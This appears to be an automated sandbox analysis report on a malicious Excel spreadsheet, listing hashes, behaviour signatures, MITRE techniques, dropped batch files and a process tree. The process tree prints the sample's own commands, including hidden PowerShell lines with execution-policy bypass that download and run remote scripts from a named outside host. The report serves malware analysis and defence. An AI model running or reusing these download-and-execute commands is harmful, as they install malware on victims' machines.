Analysis

  • max time kernel
    150s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    16-08-2022 07:45

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.18991.xls

  • Size

    33KB

  • MD5

    6dabe76f9fa957dfcb2d947ad28178f4

  • SHA1

    0c1b88561dd995109283fd14233e2c01ddb2800d

  • SHA256

    946f97092e475631921bb51d3f7c964ceab14537246ad5b91f4b4d8d6fee8410

  • SHA512

    263c9897174c1eb154e0ac49438f50a81bbb66186777f7a7c3711d93942fb80cd3b51bbef489ba56b74b090d475c98b79e02ba3b7925102be3810acb207e7685

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.18991.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:832
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1052
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1872
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:520
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1960
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1044
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2020
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1372
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:468
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1880
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:964
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1968
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1456

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    902d94a4a7f73abb1e021b4b1ebc8d0f

    SHA1

    d425ab6b22c29697c2f9cec9bb1000c34b34236d

    SHA256

    7e4cad52992b105073e914e494b4452d48c969ab68148c60b6474519ade4e543

    SHA512

    7d8da281d12b14af2cc311614ed15f4ee78096ba955919325b95e8a49ee7c9d97c06bcea3215b19c3bb347a12793e3801494cfc704ea54ae261d3865d2c7331e

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • memory/468-71-0x0000000000000000-mapping.dmp
  • memory/468-76-0x000000006B490000-0x000000006BA3B000-memory.dmp
    Filesize

    5.7MB

  • memory/468-77-0x000000006B490000-0x000000006BA3B000-memory.dmp
    Filesize

    5.7MB

  • memory/520-81-0x0000000000000000-mapping.dmp
  • memory/832-79-0x0000000071F2D000-0x0000000071F38000-memory.dmp
    Filesize

    44KB

  • memory/832-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/832-58-0x0000000071F2D000-0x0000000071F38000-memory.dmp
    Filesize

    44KB

  • memory/832-57-0x0000000075091000-0x0000000075093000-memory.dmp
    Filesize

    8KB

  • memory/832-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/832-54-0x000000002FF31000-0x000000002FF34000-memory.dmp
    Filesize

    12KB

  • memory/832-55-0x0000000070F41000-0x0000000070F43000-memory.dmp
    Filesize

    8KB

  • memory/832-75-0x0000000071F2D000-0x0000000071F38000-memory.dmp
    Filesize

    44KB

  • memory/964-73-0x0000000000000000-mapping.dmp
  • memory/1044-66-0x0000000000000000-mapping.dmp
  • memory/1052-61-0x0000000000000000-mapping.dmp
  • memory/1096-62-0x0000000000000000-mapping.dmp
  • memory/1372-67-0x0000000000000000-mapping.dmp
  • memory/1456-68-0x0000000000000000-mapping.dmp
  • memory/1872-65-0x0000000000000000-mapping.dmp
  • memory/1880-72-0x0000000000000000-mapping.dmp
  • memory/1884-70-0x0000000000000000-mapping.dmp
  • memory/1960-82-0x0000000000000000-mapping.dmp
  • memory/1960-85-0x0000000073920000-0x0000000073ECB000-memory.dmp
    Filesize

    5.7MB

  • memory/1968-64-0x0000000000000000-mapping.dmp
  • memory/2020-63-0x0000000000000000-mapping.dmp